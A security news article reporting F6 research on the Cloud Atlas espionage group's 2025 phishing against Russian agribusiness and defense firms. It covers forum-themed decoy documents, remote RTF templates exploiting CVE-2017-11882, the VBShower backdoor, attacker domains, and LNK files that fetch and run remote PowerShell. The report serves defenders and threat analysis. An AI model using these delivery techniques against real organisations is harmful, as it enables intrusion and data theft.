In 2025, F6 specialists are recording increased activity by the Cloud Atlas group, which is targeting Russian and Belarusian companies. Researchers reported that ahead of the forum “Grain and Oilseeds 2025: Feed Vector,” which will take place on October 30 in Moscow, the attackers sent a malicious email to an agribusiness enterprise disguised as the forum program.
Cloud Atlas is a “government-linked” APT group specializing in cyber-espionage and the theft of confidential data, active since 2014. It typically uses complex multi-stage attacks employing custom loaders and encrypted communication channels to covertly collect data.
In a new report, researchers describe recent Cloud Atlas attacks on enterprises in the agro-industrial and defense-industrial sectors. Overall, the attackers keep the infection chain itself unchanged, but these attacks are characterized by changes to the top-level domains, as well as experimentation with the malware delivered via phishing emails.
In mid-October, researchers observed another Cloud Atlas attack targeting a Russian agribusiness enterprise — the group sent a malicious attachment from the email address mkrutij@list[.]ru.
As bait, the attackers used the agenda of the agro-industrial forum “Grain and Oilseeds 2025: The Feed Vector,” which will take place on October 30, 2025, in Moscow.
The malicious attachment “Программа Форум Зерно и масличные.doc” did indeed contain the forum agenda, but opening it triggered the launch of the payload delivery mechanism.
The decoy (DOC file) acted as the downloader, which, via a template, fetched an RTF file containing an exploit for the Microsoft Office vulnerability (CVE-2017-11882). As a result of launching the template and exploiting the vulnerability, the us.txt dropper containing the payload — the VBShower backdoor — was downloaded.
It is noted that in the fall of 2025 this was not the group’s first attack targeting agribusiness enterprises. For example, during a similar incident recorded in September, the attackers sent emails with the subject “Бланк ТЧ” and a malicious attachment “Бланк ТЧ.doc.” Opening such a document also led to the download of an RTF file, and the payload was likewise VBShower.
During the analysis of the October attack, researchers discovered two additional files linked to the hackers’ domain (kommando[.]live) that were uploaded to VirusTotal: “Request_for_demographic_data_of_enterprises_for_2025_for_medical_services.doc” and “Appendix_ Request to conduct a procurement.doc”.
The names and contents of these files—related to procurement and the collection of enterprise employee data—suggest that Cloud Atlas targeted not only the agro-industrial sector, but also companies in Russia’s defense-industrial complex.
Subsequently, using analysis of the network infrastructure and file characteristics, F6 specialists discovered the domain atelierdebondy[.]fr, which was used by the attackers as a remote server to download the template.
It is noted that the domains the group usually uses for attacks fall into four zones — com, net, org, and info. However, in this fall’s attacks, as described above, the domain zones used were highly atypical for Cloud Atlas.
Experts say they have been observing the group’s experiments for about two years, and these changes involve not only switching top-level domains but also methods of delivering payloads.
For example, at the end of 2024, two LNK files were uploaded to VirusTotal. In both cases, when the LNK was executed, a PDF document was shown to the user as a lure, after which a request to a URL was made via Invoke-RestMethod with the User-Agent set to “Mozilla/4.0 (compatible; Windows NT 10.0; MSOffice 16)”. The server’s response was then passed to the Invoke-Expression cmdlet to execute a PowerShell command on the victim’s computer.
Later, in July 2025, two LNK files were uploaded to VirusTotal that matched the samples uploaded at the end of 2024. The attackers made almost no changes to the commands, except for adding the string ms-office; to the User-Agent field. In addition, as a result of the command execution, the server’s response was passed as an explicit function parameter to reduce the risk of detection.
Experts conclude that the analysis demonstrates the group’s diverse approach to using infrastructure, involving switches to other top-level domains, as well as various loaders employed by the group. According to F6 specialists, all this indicates a high degree of adaptability on the part of Cloud Atlas.